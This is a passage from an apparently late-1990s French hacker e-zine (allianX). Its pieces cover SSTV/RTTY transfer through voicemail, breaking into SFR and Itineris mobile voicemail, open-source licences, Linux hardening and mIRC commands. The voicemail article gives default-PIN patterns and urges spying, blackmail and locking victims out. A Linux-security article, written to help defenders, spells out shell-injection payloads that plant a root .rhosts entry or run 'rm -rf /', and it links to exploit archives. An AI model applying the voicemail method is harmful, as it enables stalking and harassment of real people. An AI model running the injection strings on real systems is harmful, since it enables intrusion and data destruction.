	Primo il vous faut une boite sur une VMB. ensuite, soit vous etes du genre prudent (voire parano), et vous preferez telephoner d'une cabine, soit vous le faites chez-vous. D'une cabine, c'est galere : reliez un walkman enregistreur sur la prise Sortie de votre carte son avec un cable a double jack et "enregistrez le bruit de l'image", ou avec un MiniDisc (soyons moderne et puis la quali est meilleure). Ensuite descendez dans votre cabine appellez la VMB et laissez votre message en appliquant bien le hautparleur du walkman ou du MD sur le micro du combin, et en limitant autant que possible les bruits exterieurs. Pour recevoir faites l'inverse : collez votre enregistreur sur le combin de la cabine et enregsitrez le message, puis branchez votre enregistreur sur la prise Micro de votre carte son et faites passez l'enregistrement sur votre ordi. De chez vous c'est plus simple, vous appelez depuis l'ordinateur via modem, vous transferez directement  de la prise "Sortie sonore" de la carte son  la prise "Entre" du modem via un cable a double jack pour envoyer vos images, et "Sortie" modem vers "Entree" carte son pour recevoir.
	Lorsque l'on reoit les images que ce soit depuis un enregistrement ou une VMB depuis le modem, on lance SSTV pour activer le dcodage de l'image : c'est trs dlicat, une petite dviation sonore peut fausser les niveaux de couleurs : image trop vive ou trop sombre, decalage des couleurs,... Bref avant de recevoir pour de vrai une image par SSTV, il vaut mieux s'entrainer avec des enregistrements que vous avez fait et que vous vous repassez jusqu'a obtenir l'image nette, semblable  l'original.
	Pour fignoler tout ca, vous prenez un boitier DTMF ou un soft dans le meme style, et vous faites un enregistrement qui fait le numero de la VMB, un petit blanc, les commandes pour entrer dans la boite vocale, puis le fichier, et enfin la commande de sortie de la VMB, hop vous avez plus qu'a passer l'enregistrement.

***********************************************************************

	III) Le protocole RTTY

	    1) Fonctionnement thorique

	Le RTTY (je sais pu ce que ca signifie les initiales), est un protocole qui permet la transmission de donnes via les ondes radio, il s'agit en clair d'un protocole qui fait correspondre une frequence  1 et une frequence  0, donc n'importe quel fichier informatique converti en binaire peut etre transmis. Le problme, c'est que je ne connais pas de programmes semblables  ceux de SSTV, capables de convertir un fichier en son. Pour communiquer en RTTY il y a la solution de la carte BAYCOM : ca peut s'acheter dans les boutiques de radioamateur (ou peut etre mme dans le commerce), ca peut se fabriquer, mais la je suis pas un pro de l'electronique donc j'en parlerai pas. Certains utilisent leur carte son avec un protocole bien  eux invent sur la base du RTTY : pourquoi pas ? Il suffit de faire un programme simple qui ouvre un fichier en bianire, emmet un son pour 0 et un autre pour 1. Jusque l aucun problme c'est franchement  la porte du premier venu, on peut meme faire ce programme en Qbasic. Le probleme c'est pour la reception, parceque la il s'agit d'un programme d'analyse de frequence : soit vous etes trs courageux et vous vous lancez dans ce projet, soit vous optez pour le RTTY classique.

	    2) Application

	Bon la procdure est simple si vous avez achet ou fabriqu une carte Baycom sinon pour l'envoi de fichiers via votre carte son il va vous falloir des logiciels : pour emmetre c'est simple du moment qu'on a les frequences, mais pour recevoir je ne connais pas de logiciel (s'il existe et qu vous l'avez ou que vous l'avez fait mailez moi), vous allez galerer. Utilisez la methode "carte son" si votre destinataire a une carte Baycom et pas vous. Enfin vous pouvez toujours transferez vos fichiers en morse (rigolez pas, le RTTY c'est comme du morse binaire). Bon l'avantage du RTTY c'est qu'il est tres fiable, avec peu d'erreurs, mais c'est trs lent, eviter les envois de plus de 5 ko pour pas saturer le repondeur de la VMB (zippez et coupez en petit morceau, sur plusieurs boites)

Frequences pour le protocole RTTY:
A la vitesse de 45 millisecondes, 1 vaut 1275 Hz et 0 vaut 1445 Hz   
Pour 50 millisecondes, c'est 1275 Hz pour 1 et 1700 Hz pour 0
A 75 ms, 1 vaut 1275 Hz et 0 vaut 2125 Hz; a 100 ms, 2125 Hz pour 1 et 2295 Hz pour 0, a 110 ms, prenez 2125 Hz pour 1 et 2550 Hz pour 0. Enfin, pour 300 ms, prenez 2125 Hz pour 1 et 2975 Hz pour 0.


	 IV) Zi end

	Le systeme SSTV est performant mais limit par le fait qu'il ne permet que le transfert d'image, le protocole RTTY permet le transfert de n'importe quel fichier mais est moins pratique. Si vous voulez transferer autre chose que des images, choisissez RTTY, sinon SSTV, enfin avec RTTY faites attention : a vouloir transferer n'importe quoi vous risquez d'obtenir un message tros gros qui risquerait d'etre grill par la boite.

Greetingz : tout ceux qui m'ont demander d'etudier le transfert de fichier par VMB, et tous mes amis radioamateurs qui m'ont appris les ifferents modes de transmissions.




LES NEWBIES D'AUJOURD'HUI SERONT LES GRANDS HACKERS DE DEMAIN

FT, ENLEVE TES FILTRES SUR TES LIGNES QU'ON PUISSE BLUE BOXER (Nd Ad-tonnou --> vouis, FT tu nous emmerdes  la fin...)


	 _
	| |
	| |
	| |
	| |
	| |    __ _   _     * __  __ 
	| |___|_ / _ /_\ |  |  / |_  
	|_____|__\_//   \|_ | /__|__ 

       P   H   R   E   A   K   I   N   G



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
	Hack de Rpondeurs de Portables 							Ad-Tonnou	
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
		     *******************************************************
		     ** HACKER LES REPONDEURS DE PORTABLES...by ad-tonnou **
		     *******************************************************

1) INTRO
~~~~~~~~

Alors voila, je vous ai pondu un petit article bien sympa parlant de repondeurs de portables, plus precisement des rpondeurs SFR et ITINERIS.
Je ne pense pas que cette info soit exclusive et je ne pense pas non plus tre le seul  savoir ce que je vais vous dire (loin de l).
Cependant vu que je n'ai jamais rencontr cette info dans aucun des zines que j' ai pu lire auparavant (et dieu sait que j' en lit des tonnes), je me suis dit que a pourrait tre bien sympa de la mettre dans le numro 1 de allianX...arrtons le bla-bla et passons  la technique...

2) SFR 
~~~~~~
Ce matin je lis mot pour mot dans mon guide SFR dans la section "COMMENT UTILISER VOT' REPONDEUR":
"vous pouvez couter vos messages vocaux depuis un autre tlphone que le votre.
-composez votre numro d' appel SFR
-Tapez # pendant l' annonce d' accueil
-Puis tapez votre code secret suivi de #"

Et la vous vous dites...."hum tu es beau ad-tonnou (ad pour les intimes) mais comment veux tu que l' on connaisse ce code....puisque comme son nom l' indique, il est secret...?"

La je vous rpond : attendez la suite boudjiou...
Je reprend: je continue et mon guide me dit :
" (...) Votre code secret initial est le 1 suivi des 5 derniers chiffres de votre numro de portable..."

Vous aurez sans doute compris maintenant...NON ? ARF !

Une grande part (tres grande!!---> rien que dans mes connnaissances : 5/7) des utilisateurs moyens ne personalisent pas leurs rpondeurs, et donc conservent le code d' acces au rpondeur par dfaut...ce qui nous fait un bon paquet d' idiots  faire chier...

EXEMPLE ---> Mon numro est le 06.17.ab.cd.ef mon code d'acces  distance  mon rpondeur sera donc 1bcdef
bcdef tant les 5 derniers chiffres de mon numro d'appel.
Voila pour la petite info (merci qui ?)

Ah oui, pour la petite info les numros SFR ne peuvent tre que de cette forme : 0619...0614...0615...0617...(je crois qu' il y en a un autre mais je sais plus...)

Mais attendez, c'est pas fini, j' ai dcid de pousser la perversion jusqu'au bout et de rechercher comment faire avec les rpondeurs ITINERIS...c' est pas plus compliqu... 	

3) ITINERIS
~~~~~~~~~~~
Alors la je vais faire vite car j' ai mon Bac  reviser...
Avec les ITINERIS c' est pareil, pour accder  une messagerie  partir d' un autre poste, on compose le 06 07 07 +les 4 premiers chiffres du numro du portables...

Ensuite on arrive  un rpondeur puis on doit faire le numero du portable en entier puis son pass...

---> Ici le code secret par dfaut est le 0000.... <--- 
Voila....

4) QUE FAIRE AVEC CA ???
~~~~~~~~~~~~~~~~~~~~~~~~
Les menus auxquels on accde: "changer le pass","couter les messages","changer l'accueil"

Aprs c'est  vous de voir...

La premire utilisation qui viend  l' esprit c'est l'espionnage...En effet c'est bien pratique de voir ce qui se passe chez un pote et les messages qui transitent par son rpondeur (essayez, les potes ne sont pas toujours ce que l' on pense)
Moi j' ai fait du chantage  un mec que j'avais trouv au pif (mais non je suis pas cruel), je lui avais dit qu' il devait trouver mon prnom si il voulait rcuperer son rpondeur....
vous allez rire mais on est devenu potes...

Sinon c' est pas mal aussi de changer l'accueil sans cesse, si le gars (ou la garse) est con (50% des cas) il ne comprendra vraiment pas pourquoi il a des messages d'accueil du genre : "humm...c 'est Lolita, viens me rejoindre...."
Il reagira en restituant son ancien message d'accueil mais ne se dira pas qu'il lui faut changer son pass...et vous aurez en prime les messages de ses potes.

Ou bien on peut tout simplement changer le pass, a la place de 0000 ou de 1+5 chhiffre; vous mettez un truc a vous, et l le repondeur vous appartiendra, mais ca c'est vraiment mchant....
(Essayez avec les numros des profs que vous aimez pas...)

Mais bon, il doit y avoir plein d' utilisations diffrentes,  vous de trouver...


5)PETITE MISE EN GARDE
~~~~~~~~~~~~~~~~~~~~~~
/!\Attention  la facture, en effet je vous rapelle que quand vous appelez un rpondeur de portable c' est au mme tarif que quand vous apelez un pote sur un portable...
C' est pas si cher que a mais il ne faut pas en abuser comme je l'ai fait.
Donc prenez garde, ne vous en servez qu'en cas de besoin ou pour dlirer de temps en temps... 



Voila j' ai fini, pour toute faute de ma part ou commentaire...
ad_tonnou@yahoo.com
ou alors la vmb officielle de la team  3651 0800 010 800,,9,*4540 et biiip :

PS : Mailez moi si vous tes intersss par allianX #2, si vous voulez nous aider et pourquoi pas devenir membre, hsitez pas...

--== Ad-Tonnou, pour vous servir... ==--

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Le Concept d'Open Sources							  Redfire
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

					********************************
					** CONCEPT DE "L'OPEN SOURCE" **
					**       (par redfire)	      **  						                        ********************************




Comment parler de Linux et des logiciels libres en general sans evoquer les abreviations comme GPL,MPL,QPL,BSD,ou encore LGPL ?

Ces termes recouvrent tous un mme type de documents juridiques : les fameuses licences 
d'utilisation.

Tous les logiciels,sans exception,sont protgs juridiquement par un texte de ce type,qui numre les droits que vous donne l'auteur sur son programme.

Ainsi, les longs textes,ou contrats,souvent ponctus par "j'accepete" ou "je n'accepte pas" ,ont une importance capitale pour leur utilisation.

Ils vous disent ce que lgalement,vous avez le droit de faire avec le logiciel que vous allez installer.
Cependant, un logiciel, pour tre considr comme libre, doit fournir plus que ses seuls codes sources..(voir "The Open Source Definition" : www.linux-france.org/article/these/osd/fr-osd-1.html)
Il doit rpondre aux critres suivants :



Libre redistribution :


La licence ne doit pas empcher de vendre ou de donner le logiciel.
La licence ne doit pas exiger que cette vente soit soumise a l'acquittement de droits d'auteur ou de royalties.



Code source :


Le programme doit inclure le code source et la distribution,sous forme de code source comme sous forme compile.
Il n'est pas autorise de proposer un code source rendu difficile  comprendre.
Il n'est pas autorise de proposer des formes intermdiares,comme celles qu'engendrent un 
prprocesseur ou un traducteur automatique.



Travaux drivs :


La licence doit autoriser les modifications,les travaux drivs et leur distribution sous les mmes conditions que celles qu'autorise la licence du programme original.



Intgrit du code source de l'auteur :


La licence ne peut restreindre la redistribution du code source sous forme modifie que si elle autorise la distribution de fichiers "add-on" aux cts du code source dans le but de modifier le programme au moment de la construction.La licence doit explicitement permettre la distribution de logiciels construits a partir du code source modifi.La licence peut exiger que les travaux drivs portent un nom diffrent ou un numro de version distinct de ceux du logiciel original.



Pas de discrimination :


La licence de doit oprer aucune discrimination  l'encontre de personnes ou de groupes de
personnes.
La licence ne doit pas limiter le champ d'application du programme.Par exemple,elle ne doit pas interdire l'utilisation du programme pour faire des affaires ou dans le cadre de la recherche.



Distribution de la licence :


Les droits attachs au programme doivent s'appliquer  ous ceux  qui le programme est redistribu sans que ces parties ne doivent remplir les conditions d'une licence supplmentaire.



La licence non spcifique :


Les droits attachs au programme ne doivent pas dpendre du fait que le programme fait partie d'une distribution logicielle spcifique.



Non contamination :


La licence ne doit pas apposer de restrictions sur d'autres logiciels distribus avec le programme qu'il couvre.
Par exemple,le licence ne doit pas exiger que tous les programmes distribus grce
au mme mdium soient des logiciels "open source".



Exemples de licences :


Les licences suivantes sont des exemples de licences que nous considrons conformes  la dfinition de "l'open source" : GNU GPL,BSD,X Consortium,et Artistic? C'est aussi le cas de la MPL.

Extraits de "The Open Source Definition"



Vous vous apercevez maintenant que,la notion de "open source",bien qu'elle paraisse assez simple, est en fait strictement controle et remplies de nuances juridique trs importante.

La licence la plus rpandue dans le monde Linux et aussi celle qui est la plus lourde de sens.
La Gnu Public Licence ou GPL a t crite pour la 1ere fois par Richard M. Stallman en 1984.
En tant que licence "Open Source" ou licence libre,elle autorise la libre copie,la libre modification et la libre distribution du logiciel qu'elle protge.Mais le GPL est plus restrictif que la simple dfinition de l'Open Source.En effet,la dfinition du logicle libre n'a t que rdige en 1998.
Mais c'est GPL qui a fait evolu les choses...

Aujourd'hui,les logiciels en Open Source commence a prendre de plus en plus de poids.On retrouve un principe de partages de connaissances.
Grace a la diffusion des codes sources,un petit programme en bta se retrouvera vite en version bien plus complete,amliore et corrige de ses bugs.
Ce sont les utilisateurs eux-mme qui font evoluer le logiciel.

Si Linux est en constante amlioration,c'est grce  la diffusion de son code source.En effet, si Linux est aujourd'hui un des OS les plus stables et les plus srs dans le monde,ce n'est pas un hasard : chaque fois par exemple qu'une faille de scurit est dtecte dans le kernel,une mise  jour est disponible trs peu de temps aprs sur Internet.Et ainsi va la communaut Linux : 
Une parfaite volution.De quoi donner des leons  certaines multinationales.... (Nd Ad-tonnou --> ha bon ?? qui ??)

Et puis des diteurs comme Mandrake ou SuSe nous montrent bien qu'il est possible de vivre de la diffusion d'un OS libre : suite de logiciels,documenation riche et dtaille,et service techniques performants sont autant de services qui plaisent aux utilisateurs dbutants.

En ce qui concerne les suites bureautiques,on a pas encore atteint le stade d'Open Source,mais
les choses avancent.Citons par exemple StarOffice,qui est disponible en version complete sur des
CD-ROM de mag,mais qui ne propose pas encore ses sources.


Voil voil,j'en ai finis avec cette article sur l'Open Source.
Je sais bien que c'tait pas vraiment un article de hack,mais au moins,c'est original et c'est pas du rchauff,na ! :)) (Nd ad-tonnou --> bien envoy red)
J'espere qu'il vous aura quand mme plu... Le sujet Linux est vaste, et j'aurais l'occasion d'y revenir dans mes prochains articles...



redfire
redfire@ifrance.com


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Secu Linux							  	[-AhfeeLinuX-] 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


=--------======== Linux et la securite ===========-----------

Linux, probablement le systeme d'exploitation le plus securis! voyons ca de plus pres , avec des explications ... 

Sous linux, comme sous n'importe quel OS, il y a des failles! Elles sont gnralement provoques par des programmes comme Sendmail et compagnie.
Nous allons voir comment tester nos protections.

Tout dabord, il vous faut un Scanner d'exploit , ex : SATAN ( Security Administrator Tool for Analising Network ) ou d'autres , voici les URL's :

Satan : www.trouble.org/~zen/satan/satan.html
ABACUS-sentry : http://www.psionic.com/
Nessus : http://www.nessus.com/ ( pour avoir de plus amples information sur l'installation de Nessus , contactez moi a
open-sockz@isecurelabs.com
Nmap : www.insecure.org /nmap

Ces programmes servent a connaitres vos port ouvert, vos services, et surtout, les failles de votre system ( ou d'un autre ;) etc ...

Une fois la faille detecte , deux solutions , sois vous avez un bon firewall , sois vous changer la version de votre programme et vous pas a une
version ultrieure. Mais attention , un bon firewall est tout de mme mieux , car mme avec une version ultrieure , il y a des failles, peut tre pas les mmes mais en tout cas il y en a quand mme!

Pour avoir un exemple de bon firewall, je vous conseille d'aller voir le site http://www.freshmeat.com/ et de rechercher firewall ou Ipchains, mais si vous voulez un bon firewall fait en perl utilisant ipchains (il est totalement configurable !! ) contactez moi a open-sockz@isecurelabs.com !

Les failles, appells Exploit (Nd ad-tonnou --> les exploits, c'est plutot les procdures  faire pour exploiter ces failles), servent aux hackers pour penetrer dans un system, si la faille se trouve dans sendmail version 2.3.4, le hackers va voir sur un site comme http://www.r00tabega.com/ ou http://www.isecurelabs.com/ ou encore http://www.rootshell.com/ ainsi que http://www.technotronic.com/
Une fois qu'il a trouver le programme pour exploiter la faille de sendmail , il l'execute a partir d'un shell distant et voila,  system pntr !

Si vous aimez tout ce qui est hacking , moi aussi ! http://www.isecurelabs.com/ est mon site ( avec un pote ) et je pense que l'on a la liste d'exploit la plus grosse entre tout ces sites.

C'est pourquoi il est tres important de se proteger! car la faille est vite arrive !

Tout dabord , une configuration adequate de /etc/inetd.conf . Selon pas mal de gens , une bonne partie de la secu serais dans le kernel ! mais je n'ai
pas encore eu le temps de voir ca :(

Pour un minimum de securit , va dans un terminal et tape /mcedit /etc/inetd.conf

il faut te securiser sur les Rcmd et tout ca ! alors descent dans le rep , et tu vera :
# Shell, login, exec and talk are BSD protocols.
#
# shell stream tcp nowait root /usr/sbin/tcpd in.rshd -L
# login stream tcp nowait root /usr/sbin/tcpd in.rlogind
# exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
# talk dgram udp wait root /usr/sbin/tcpd in.talkd
# ntalk dgram udp wait root /usr/sbin/tcpd in.talkd
#
# Kerberos authenticated services
#
# klogin stream tcp nowait root /usr/sbin/tcpd rlogind -k
# eklogin stream tcp nowait root /usr/sbin/tcpd rlogind -k -x
# kshell stream tcp nowait root /usr/sbin/tcpd rshd -k
#
a mon avis , il y aura des lignes ou yaura pas la # , ba il fo la mettre , comme ci dessus ! la tu es securis , descendon un peu plus bas encore !
#
# finger stream tcp nowait nobody /usr/sbin/tcpd in.fingerd -u
# systat stream tcp nowait nobody /usr/sbin/tcpd /bin/ps -auwwx
# netstat stream tcp nowait root /usr/sbin/tcpd /bin/netstat -a
#
tu pourras voir ca, a mon avis il manquera le # a netstat et systat, bref tu les mets!
Dans mes expemples, elles y sont deja car je suis deja securis !

la , tu tape F2 , et F10 ! et ca y est ! tu es secu pour ca ! il te reste a taper :
killall -HUP inetd
pour reinitialiser le deamon , donc pour qu'il prenne en compte les modif et voila!!!

En fait ces modif servent a Bloquer l'access a certaine facon de se logger qui peuvent faire d'autres utilisateurs des root ...

bref , la tu es securis !

Si tu veux securis encore plus ton system , il y a des fichiers comme :
/etc/sudoers , ce fichier te permet de definir les programmes autoriss par qqun qui est logger en Super Utilisateur ( presque root ) avec la commande su.

/etc/ftpusers , dans ce fichier , si tu met un login dedans , la personne a qui appartien ce login , ou qui se loggera avec ce login ne pourra pas acceder a ta machine en ftp , en gros si tu met un login dedans , ce login peu pas venir en ftp sur toi.

ipchains , cette commande est un firewall , tu pourra apprendre a ten servire en tappant ipchains --help ou encore man ipchains


Article ecris par [-AhfeeLinuX-] - ahfeelinux@caramail.com - 1999-2000
AllianX.


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Secu Linux							  	Sauron 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

salut,

Aujourd'hui on va causer securite linux,histoire de varier un peu ;o)
Alors, il faut savoir que la premiere chose que va faire un Cracker va etre
de scanner votre machine afin de voir quels sont les ports d'ouvert, et ainsi
de determiner les services qui trournent sur votre machine. Quand je scan une
becane et que je vois le port 79 d'ouvert par exemple, la premiere chose que
je vais faire est de lancer finger sur les noms d'utilisateurs les plus courants
(ceci est valable pour tous les os si le 79 est attribu au service finger)
Mon but etant dans un premier d'obtenir de l'informations sur la cible afin de trouver
ce a quoi elle est vulnrable. Plus il y a de port ouvert, plus il y a de service qui
tourne, donc logiquement plus il y a de possibilit d'exploit... Et il est tres simple de 
se procurer tous les exploits recens sur un systeme en moins de 2 minutes ! Aller par exemple
sur ftp.technotronic.com qui est un tres bon debut, ou procurez vous l'archive des hole de 
www.hack.co.za ( site maintenant fermer depuis qu'un abruti a obtenu le root sur leur hebergeur ! )
Il vous faut donc restreindre
les services au minimums dont vous avez besoins, pour cela editez /etc/inetd.conf
et mettez un # devant toutes les lignes des services qui ne vous interessent pas.
Relancez inetd ( killall -HUP inetd ). Voila deja une bonne chose de faite, ce n'est bien sur pas
suffisant. De nombreux scanner tres utiliser comme sscan ou exscan pour Unix avouent utiliser les
messages apparaissant lors d'une conection sur un service. Par exemple sur dans de nombreuses 
distributions linux, le messages par default de tels service annonce le systemes d'exploitation
utilis, sa version, ainsi que le numero du kernel utilis! (par exemple telnet www.server.com 25 vous donnera la version du sendmail de www.server.Com)
De tel informations sont crutiales pour un pirates, car uniquement a partir de cela il peut
gagner un root sur votre machine en allant chercher un quelquonque exploits marchant sur votre
systeme si vous ne l'avez pas patcher ; d'o l'interet d'aller chercher tous les correctifs
sur les sites officiels et de s'abonner au liste de diffusion relatant de securit informatique.
En adoptant cette conduite vous serez averti en mme temps que les crackers et mme si le
correctif n'est pas sorti vous pourrez au moins desactiver provisoirement le service 
vulnrable. 
 ## NOTE ## 
 /etc/issue pour modifier le message d'arriver.
 ## EON ##
Assurer vous d'utiliser une version recente des services ou prener au moins la peine de
les patcher. Verifier que tous les comptes par default offrant des privileges root sont bien
verrouiller ( un * dans le deuxieme champs dans les fichiers /etc/passwd ou /etc/shadow pour linux ).
Au pire changer les mots de pass. !!! Utilisez des passwd complexes, alliant chiffre et lettres !!!
Trouver des passwd qui ne sont pas des dico de pass. Avec la commande chmod, assurer vous que
le maximum de fichiers inutile au simple users ne leurs sont pas accecibles, pas meme en lecture!
 ## NOTE ##
 Il vous parait peut etre inutile de cacher /bin, cependant sachez que c'est essentiels !
 Ce n'est pas la peine de se donner du mal a cacher votre os si vous permettez aux simple user de
 le determiner. D'autant plus si vous offrez un compte par default comme anonymous (ftp dans le fichier 
 passwd). Dans une telle situation, je me log en simple user, je d/l un fichier de /bin ( ls par exemple )
 et je determine pour quel systeme il a t compil.
 ## EON ##
Ca ne suffit pas encore!! Si vous offrez un service de page web, assurez vous que http n'est pas lancer en
tant que root. Encore plus si vous executer des scripts cgi ! Et encore encore plus si vous creer vos propre
script cgi ! J'avais envisager a une epoque de mettre a dispositions les nombreux article relatant de securit
que je possede. Pour ne pas avoir a faire des pages web avec des liens et un descriptif de chacun des articles,
je voulais mettre un script cgi, qui aurait rechercher les fichiers dans lesquelles aurait ete present le mot taper 
par les visiteurs de ma page. Pour cela je comtai utiliser un script perl faisant appel au shell de cette maniere :
		system("grep $motchercher /home/sauron/documents/");
Un appel systeme ralis de telle maniere peut saverer tres tres dangereux si httpd est lancer en tant que root,
en fait il offre un shell a qui veut ! Bien que l'utilisateur n'ai que une page web sous les yeux avec un champs pour
marquer le mots rechercher il peut effectuer n'importe quelle commande sur le systeme si l'utilisation des metacaracteres
n'est pas bloquer dans le script. Dans le shell, on peut effectuer deux commande sur une meme ligne en les separant par un
point virgule, dans le champ de la page web, on pourrait tromper le serveur en entrant ceci dans le champ :
hack ; echo " + + " >> /root/rhost 
par exemple ou 
ljjm ; rm -rf /
pour fromat tous le system !! Voici pk il ne fo pas utiliser de script cgi si httpd est lancer en tant que root.
Bien sur, toutes les failles cgi ne sont pas li a cette commande en perl. La fonction sytrcopy() en C provoque
galement une faille c'est pk il faut utiliser strncopy(), et il y en a encore des tas. Je conseille le scan
hackboard fait par kosak pour windows ( isecurelabs.com ) ou celui  riven de zorgon pour linux ( zorgon.freeshell.org ).
Bien sur, uniquement en attendant le miens ;oD (Nd ad-tonnou; paraitra dans allianX j'espere...)
Afin de securiser votre systeme il vous faut absolument empecher les crackers d'obtenir de l'info. sur votre
systeme, WHOIS, host, la command expn dans sendmail, etc.....
Je ne vais pas dtailler chacune des marches a suivre, d'autant que certains l'ont deja fait ( aller voir www.multimania.com/ouah )
Il est difficile de se proteger du tcp fingerprinting qui permettra a l'attaquant de savoir qu'elle systeme vous utiliser
en envoyant des paquets specifiques et en analysant la reponse, variable d'un systeme a l'autre.
Faites bien attention a vous proteger du spoofing en ne faisant confiance a aucun systeme !! Meme si un ami a un ip
constant et que vous voulez luidonner des privileges root, ne lui donner pas acces a rlogin, offrer lui un shell en telnet avec un pass compliquer ! Ceci pour deux raisons : 
*** Si votre amis se faisant lui meme hacker, vous comprometez votre systeme puisuqe son cracker pourra avoir egalement un shell root sur votre machine, et ce, sans que vous vous en rendiez compte, puisqu'a vos yeux, c'est votre amis qui est connecter !
*** De plus, si un Cracker est en mesure de prevoir vos numros de sequence, il floodera votre amis et se connectera a votre machine en utilisant l'adresse de votre amis. Etant donner la complexiter d'une telle attaque, il lancera quelque commande a l'aveuglette mais un echo "+ +" >> /root/rhost est si vite lancer ! ( c'est de cette maniere que Mitnick a pirater son ancien pote Tsutomu ou un truc comme ca ).
Et au cas ou un pirates obtiendrait le root sur votre machine, installer des programmes qui surveille si une rootkit n'est pas installer par exemple. Ajouter les options -l -L et -o a la fin de chaque ligne de inetd.conf pour que vos logs soit plus important. Le must serait d'avoir un serveur de log distant, meme sur un reseau locale et ou les donnee sont uniquement inscriptible, comme ca votre cracker ne pourra pas effacer son ip des log, si il n'a pas effectuer une attaque par rebond !
Voila, je vous ai presenter quelque aspect de la securit informatique, il y en a encore de nombreux, mais je ne pretend
pas vous apprendre a securiser une machine efficassement mais simplement a vous donner les bases, le minimum.
Je vous conseille egalement de telecharger sur le site de ouah un programme qui simule de nombreuse vulnrabilit pour
en realit mieux logger votre pirates... Voila, ces quelques astuces decourageront les pirates cherchant des machines facilement vulnrable pour obtenir des shell et attaquer d'autres machines, mais peut etre pas les acharner.
N'oubliez pas d'essayer de vous pirater, au moins avec les outils les plus utilis, nmap et les autres pour voir ce que cela donne; pour savoir qu'elle information obtiendrait tout individus vous scannant.
Pout tout apport, critique, remarque ou autre ===> humour@humour.com


PS : je me demande si il ne serait pas possible de changer le module gerant le renvoie de paquets tcp/ip, celui qui offre la possibilit au attaquant de decouvrir votre os par tcp fingerprinting pour le remplacer ou le modifier pour qu'il reponde comme repondrait un autre os comme win par exemple.. Je ne me suis pas pencher sur la questions mais j'aimerais vivement savoir si c'est possible. Vous pouvez me trouver sur l'irc sur irc.neoserv.net sur #linux 

--== SAuron de Mordor (hhh) ==--




=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Mirc Scripting							  	FT-One 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


=================================INTRODUCTION A L'IRC SCRIPTING================================


Avant d'attaquer le scripting, voici un rappel des differentes commandes principales :

Voici les commandes principales :
   /connect        : se connecter
   /disconnect     : se dconnecter
   /join #canal    : rejoindre le canal de votre choix .  #canal  dans ce cas .
   /part #canal    : quitte le canal de votre choix .
   /nick  moi      : Vous donne le surnom  moi  
   /list           :  fait la liste des canaux
   /quit           : Vous dconnecte de lIRC .
   /msg  A  lut   : Vous enverrez le message  lut  a lutilisateur A
   /query A        : Ouvre une fentre de discussion avec lutilisateur A
   /whois A        : Obtenir des informations sur lutilisateur A
   /me sen va     : dcrit ce que vous faite ( ici, ca donnera  *moi sen va  (puisque votre surnom est moi ))
   /ame salut      : crit  salut  dans tous les canaux dans lesquels vous tes . 
   /away travail   : Lorsque les autres utilisateurs vous envoient un /msg, un message spcifiant que vous tes occupe sera envoy avec la raison : travail . retapez /away pour dsactiver loption
   /invite A #FR   : Invite lutilisateur A sur le canal #FR
   /topic #FT bye  : Changera le sujet du canal #FR en Bye
   /echo 5 lut    : crira   lut  avec la couleur 5 et sans afficher votre surnom (vous pouvez aussi mettre de la couleur avec ctrl+k)
   /ajinvite on/off: choisir de rejoindre automatiquement un canal sur invitation    
   /dns A          : retourne lIP de lutilisateur A
   /log on/off  #fr:  sauvegarde ce qui est dit dans #fr dans un fichier log
   /exit           : quitter mIRC


Maintenant, les commandes rserves aux oprateurs :
   /kick #FR A     : Expulse lutilisateur A du canal #FR
   /mode #FR [+/-] [bilmnopstk]        b    : bannir  un utilisateur
				       i    : mettre laccs au canal sur invitation
                                      lx    : limiter le canal a x utilisateu                                                           m    : modrer le canal ( seuls les oprateurs et les utilisateurs voics peuvent parler )                                                                                                    n    : interdire les /MSG externes au canal
                                       o    : donne le mode oprateur a un utilisateur .
                                       p    : mettre le canal en mode priv .
                                       s    : mettre le canal en mode secret .
                                       t    : le topic ne peut tre change que par les operateurs
                                       k    :  laccs au  canal est protg par un mot de passe

_______________________________________________________________________________________________


Les Identificateurs remote : (cette liste est loin dtre complte, mais les identifieurs les plus importants y figurent )

$address
Donne ladresse de la personne qui a dclenche  un vnement .

$asctime(hh:nn:ss)		
Donne lheure 

$fulladdress
Donne ladresse complte de la personne qui a dclenche un vnement .

$chan
retourne le nom du  channel associ a un vnement .

$clevel
Donne le niveau de lutilisateur qui a dclench un vnement

$dlevel
Donne le niveau des usagers par dfaut . ( 1 normalement )

$event
Donne le nom de vnement qui sest produit .


$groupe(N/#)
Donne le statut ou le nom dun groupe

Attributs: statut, name, fname

$group(0)		Donne le nombre dutilisateurs.
$group(1)		Donne le nom du premier groupe.
$group(2).name	             Donne le nom du 2e groupe.
$group(#abc).fname	Donne le nom de fichier dans lequel le groupe est prsent .
$group(1).status	              Rpond par la valeur  on ou off pour le premier groupe.
